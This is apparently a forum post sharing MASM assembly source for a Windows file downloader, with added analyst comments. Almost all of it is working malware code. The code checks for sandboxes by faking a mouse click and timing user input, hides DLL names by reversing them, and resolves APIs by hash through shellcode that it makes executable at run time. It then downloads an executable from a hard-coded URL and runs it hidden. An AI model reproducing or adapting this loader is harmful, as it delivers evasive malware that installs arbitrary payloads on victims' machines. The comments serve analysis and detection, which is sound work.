[MASM] File Downloader

Iniciado por ANTRAX, Junio 05, 2012, 04:41:40 PM



Junio 05, 2012, 04:41:40 PM Ultima modificación: Junio 03, 2013, 11:53:58 AM por Expermicid
Código: asm
; --- Review / analyst notes -----------------------------------------------
; Target: 32-bit Windows, MASM (Intel syntax), flat memory model, stdcall for
; the Win32 calls. What the code below visibly does, in order: a 5-second
; timing check built on GetLastInputInfo plus a synthetic mouse click; a
; VirtualProtect that makes a byte blob in .data executable; a PEB walk to
; the kernel32 image base; export lookups by name-hash through that blob
; (LoadLibraryA, URLDownloadToFileA, ShellExecuteA); a download to a
; hard-coded filename; and a ShellExecuteA on the downloaded file. It is a
; downloader stub. The annotations are written for analysis and detection
; engineering, not as a guide to reuse.
.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib

; Local copy of the Win32 LASTINPUTINFO layout {UINT cbSize; DWORD dwTime;}
; used with GetLastInputInfo in `start` (cbSize is filled in there before
; each call). NOTE(review): MASM32's windows.inc may already declare this
; type; if the assembler reports a redefinition, remove this copy.
LASTINPUTINFO struct
    cbSize DWORD ?          ; size of this struct; the caller must set it
    dwTime DWORD ?          ; tick count of the last input event, compared in ms below
LASTINPUTINFO ends

.data

; szLoadAPI -- 118 bytes of position-independent x86 code stored as data and
; made executable at run time (VirtualProtect in `start`). Decoding the bytes:
;   in:   EDX = image base of a loaded module, EBX = 32-bit hash of an export name
;   out:  EAX = address of the export whose name hashes to EBX, or 0 if none does
;   walk: e_lfanew -> export directory; iterates AddressOfNames, resolves the
;         hit through AddressOfNameOrdinals and AddressOfFunctions.
;   hash: edi = 0; for each byte of the name, including the terminating NUL:
;         edi += byte; edi = rol(edi, byte)
;   clobbers: EAX, ECX, ESI, EDI and, on the found path, EBX. EDX is saved and
;         restored around the body. The `mov edx,1B6258C2h` right before the
;         not-found `pop edx` is dead (overwritten by the pop).
; Detection note: the observable pattern is a PAGE_EXECUTE_READWRITE
; VirtualProtect on a .data range followed by a CALL into that range.
szLoadAPI db 055h, 08Bh, 0ECh, 083h, 0C4h, 0F4h, 052h, 089h, 055h, 0FCh, 08Bh, 04Ah, 03Ch, 003h, 0CAh, 089h, 04Dh, 0F4h, 08Bh, 049h
          db 078h, 003h, 0CAh, 089h, 04Dh, 0F8h, 08Bh, 051h, 018h, 08Bh, 049h, 020h, 003h, 04Dh, 0FCh, 033h, 0FFh, 08Bh, 031h, 003h
          db 075h, 0FCh, 033h, 0C0h, 051h, 0ACh, 08Bh, 0C8h, 003h, 0F8h, 0D3h, 0C7h, 085h, 0C0h, 075h, 0F5h, 059h, 03Bh, 0FBh, 074h
          db 010h, 083h, 0C1h, 004h, 04Ah, 075h, 0E0h, 0BAh, 0C2h, 058h, 062h, 01Bh, 05Ah, 033h, 0C0h, 0C9h, 0C3h, 08Bh, 045h, 0FCh
          db 08Bh, 04Dh, 0F8h, 08Bh, 059h, 018h, 08Bh, 049h, 024h, 003h, 0C8h, 02Bh, 0DAh, 0D1h, 0E3h, 003h, 0CBh, 00Fh, 0B7h, 019h
          db 08Bh, 04Dh, 0F8h, 08Bh, 049h, 01Ch, 003h, 0C8h, 0C1h, 0E3h, 002h, 003h, 0CBh, 003h, 001h, 05Ah, 0C9h, 0C3h

    ; Download source and destination. szFileName carries no directory, so the
    ; API call resolves it against the process's current directory.
    szURL                   db 'http://example.com/file.exe', 0
    szFileName              db 'deadlyvermilion.exe', 0

    ; DLL names stored reversed ('URLMon.dll', 'Shell32.dll') and fixed up in
    ; place by StrReverse at run time, so neither appears in a plain strings
    ; dump. Neither DLL is in the import table either: only kernel32/user32
    ; are linked statically (see the includelib lines above).
    szURLMon                db 'lld.noMLRU', 0
    szShell32               db 'lld.23llehS', 0

    dwLoadAPI               DWORD ?     ; address of the szLoadAPI blob

    ; Pointers resolved at run time through the hash stub; none is checked for
    ; zero before use in `start`.
    dwLoadLibraryA          DWORD ?
    dwURLMon                DWORD ?     ; HMODULE from LoadLibraryA("URLMon.dll")
    dwShell32               DWORD ?     ; HMODULE from LoadLibraryA("Shell32.dll")
    dwURLDownloadToFileA    DWORD ?
    dwShellExecuteA         DWORD ? 

    ; Two samples of the last-input tick count, taken around the Sleep + click.
    FirstInput      LASTINPUTINFO <>
    SecondInput     LASTINPUTINFO <>
   
.code

;-----------------------------------------------------------------------
; StrReverse(lpString) -- reverse a NUL-terminated byte string in place.
; ABI:   stdcall, one stack argument
; In:    lpString = writable, NUL-terminated buffer
; Out:   string reversed in place; EAX is left pointing into the middle of
;        the buffer (not a meaningful return value; callers here ignore it)
; Clobb: EAX, ECX, EDX, flags -- all caller-saved under stdcall, so nothing
;        is pushed/popped.
; NOTE(review): the terminator scan adds 1 before the first compare, so an
; empty string ("" at lpString) is scanned from offset 1 and the read runs
; past the buffer. A one-byte string does a single self-swap, which is
; harmless. `jl` is a signed pointer compare; `jb` is the unsigned form and
; would be correct for buffers above 80000000h as well.
;-----------------------------------------------------------------------
StrReverse proc lpString:LPSTR
mov eax,lpString                       ; EAX = head cursor (start of string)
mov edx,eax                            ; EDX = tail cursor, advanced to the NUL below
@@:                                    ; find the terminator (starts at offset 1, see note)
add edx,1
cmp byte ptr [edx],0
jne @B
sub edx,1                              ; EDX = last non-NUL byte
@@:
mov cl,byte ptr [eax]          ; swap *EAX and *EDX through CL/CH
mov ch,byte ptr [edx]
mov [eax],ch
mov [edx],cl
add eax,1                      ; move the cursors toward each other
sub edx,1
cmp eax,edx
jl @B                          ; stop once they meet or cross (signed compare)
ret
StrReverse endp

;********************************************************************************

start:

    ; --- 1. Timing / input check -------------------------------------------
    ; Read the last-input tick, sleep 5 s, emit a synthetic left click, read
    ; the tick again. With no MOUSEEVENTF_MOVE flag the click lands at the
    ; current cursor position, i.e. it is a real click on the user's desktop.
    MOV FirstInput.cbSize, SizeOf LASTINPUTINFO
    MOV SecondInput.cbSize, SizeOf LASTINPUTINFO

    Invoke GetLastInputInfo, ADDR FirstInput
    Invoke Sleep, 5000
    Invoke mouse_event, MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
    Invoke mouse_event, MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
    Invoke GetLastInputInfo, ADDR SecondInput

    ; Exit unless the last-input tick advanced by at least 4500 ms across the
    ; 5 s sleep. A registered synthetic click normally advances it, so the
    ; exit path is taken where mouse_event / GetLastInputInfo do not behave
    ; that way -- commonly read as an environment (sandbox) check; the post
    ; itself does not say. Return values of the API calls are not checked.
    MOV EAX, SecondInput.dwTime
    SUB EAX, FirstInput.dwTime
    CMP EAX, 4500
    JL ExitMain


    ; --- 2. Make the hash-lookup blob executable -----------------------------
    ; 118 = size of szLoadAPI. The last argument (lpflOldProtect) is 0; the
    ; documented API requires a pointer there, so this call is expected to
    ; fail, and its return value is not checked. Whether the CALLs into the
    ; blob below then work depends on the process's DEP policy -- TODO confirm.
    Invoke VirtualProtect, ADDR szLoadAPI, 118, PAGE_EXECUTE_READWRITE, 0

    ; Turn 'lld.noMLRU' / 'lld.23llehS' back into the real DLL names (in place).
    Invoke StrReverse, ADDR szURLMon
    Invoke StrReverse, ADDR szShell32

    LEA EAX, szLoadAPI
    MOV dwLoadAPI, EAX

    ; --- 3. Find the kernel32 image base via the PEB ------------------------
    ; FS:[30h] = PEB; PEB+0Ch = Ldr; Ldr+0Ch = InLoadOrderModuleList.Flink
    ; (this image); two Flink hops reach the third entry, which is kernel32
    ; under the conventional exe -> ntdll -> kernel32 load order; +18h =
    ; DllBase. NOTE(review): relies on that load order, not guaranteed by
    ; contract -- verify per Windows version.
    ASSUME FS:NOTHING
    MOV EAX, FS:[30h]
    MOV EAX, [EAX+0Ch]
    MOV EAX, [EAX+0Ch]
    MOV EAX, [EAX]
    MOV EAX, [EAX]
    MOV EAX, [EAX+18h]

    ; --- 4. Resolve APIs by export-name hash ---------------------------------
    ; Stub contract: EDX = module base, EBX = hash, EAX = address or 0. The
    ; hash constants are the ones the author pairs with each variable name;
    ; they are not independently verified here. No result is checked for 0,
    ; so a miss turns the following CALL into a jump to address 0.
    MOV EDX, EAX
    MOV EBX, 0A216A185h
    CALL dwLoadAPI
    MOV dwLoadLibraryA, EAX

    PUSH OFFSET szURLMon               ; LoadLibraryA("URLMon.dll"), EAX still = LoadLibraryA
    CALL EAX
    MOV dwURLMon, EAX

    PUSH OFFSET szShell32              ; LoadLibraryA("Shell32.dll")
    CALL dwLoadLibraryA
    MOV dwShell32, EAX

    MOV EDX, dwURLMon
    MOV EBX, 0B2040657h
    CALL dwLoadAPI
    MOV dwURLDownloadToFileA, EAX

    MOV EDX, dwShell32
    MOV EBX, 0D9A88A30h
    CALL dwLoadAPI
    MOV dwShellExecuteA, EAX

    ; --- 5. Download and run -------------------------------------------------
    ; URLDownloadToFileA(pCaller=0, szURL, szFileName, dwReserved=0, lpfnCB=0);
    ; the HRESULT in EAX is ignored.
    PUSH 0
    PUSH 0
    PUSH OFFSET szFileName
    PUSH OFFSET szURL
    PUSH 0
    CALL dwURLDownloadToFileA

    ; ShellExecuteA(hwnd=0, lpOperation=0 -> default verb, szFileName,
    ; lpParameters=0, lpDirectory=0, nShowCmd=0 = SW_HIDE). Runs regardless of
    ; whether the download above succeeded; return value ignored.
    PUSH 0
    PUSH 0
    PUSH 0
    PUSH OFFSET szFileName
    PUSH 0
    PUSH 0
    CALL dwShellExecuteA     
   
ExitMain:
    ; Returns from the entry point instead of calling ExitProcess; EBX/ESI/EDI
    ; clobbered by the stub are not restored first -- NOTE(review), confirm
    ; the loader thunk tolerates this.
    RET
end start


By DeadlyVermilion